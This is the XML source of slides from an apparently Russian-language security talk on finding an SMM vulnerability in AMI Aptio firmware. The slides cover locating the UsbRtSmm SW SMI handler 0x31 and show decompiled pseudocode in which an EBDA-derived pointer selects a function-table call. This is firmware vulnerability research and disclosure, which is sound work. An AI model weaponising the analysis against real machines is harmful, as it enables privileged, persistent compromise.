                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Impact and consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Conclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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516" name="Shape 516"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Shape 517"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839875" y="5652746"/>
            <a:ext cx="9682200" cy="435300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Remember the AptioCalypsis? [Cr4sh. Exploiting AMI Aptio firmware on example of Intel NUC]</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Shape 518"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 3. Choosing SMI handler to analyse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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520" name="Shape 520"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1427425"/>
            <a:ext cx="8077201" cy="41491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525" name="Shape 525"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Shape 526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651050" y="1559854"/>
            <a:ext cx="9682200" cy="219870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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>One of the affected handlers is present here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E63451"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd472f10: SMI = 0x31, addr = 0xbd474ca8, image = UsbRtSmm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>UsbRtSmm module contains the implementation of the SW SMI handler #0x31</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Shape 527"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 3. Choosing SMI handler to analyse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Shape 528"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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529" name="Shape 529"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731854" y="2948004"/>
            <a:ext cx="8615227" cy="1471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534" name="Shape 534"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Shape 535"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651039" y="1559880"/>
            <a:ext cx="9682200" cy="118620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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Use ida-efitools scripts to parse the BIOS modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The UsbRtSmm module is located at 0xBD473000, and the SW SMI handler (aka DispatchFunction) at 0xbd474ca8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>It seems they have patched the AptioCalypsis issue, but we found another one...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Shape 536"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Shape 537"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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542" name="Shape 542"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Shape 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650349" y="1547300"/>
            <a:ext cx="11043000" cy="493950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6FA8DC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>external int64</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> ptr;</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> // memory address 0xBD48B460</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CFE2F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>EFI_STATUS</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> DispatchFunction()</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	if (*((int8 *) ptr + 0x76B8) == 0 || *((int8 *) ptr + 8) &amp; 0x10)</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="6FA8DC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 0;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	*((int8 *) ptr + 0x76B8) = 0;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// 0x40e stores segment address of Extended BIOS Data Area</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	struct_ptr = *((int8 *) 0x10 * 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>40e + 0x104); </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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	if (IsSmramArea(struct_ptr))</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="6FA8DC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="0" sz="15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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	*((int8 *) ptr + 0x7AF5) = 1;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// struct_ptr[0] holds the number of called subfunction</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	if (struct_ptr[0] &gt;= 0x20 &amp;&amp; struct_ptr[0] &lt;= 0x38)</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="DD7E6B"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>off_BD473E30</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[struct_ptr[0]](struct_ptr);</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	…</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Shape 544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Shape 545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
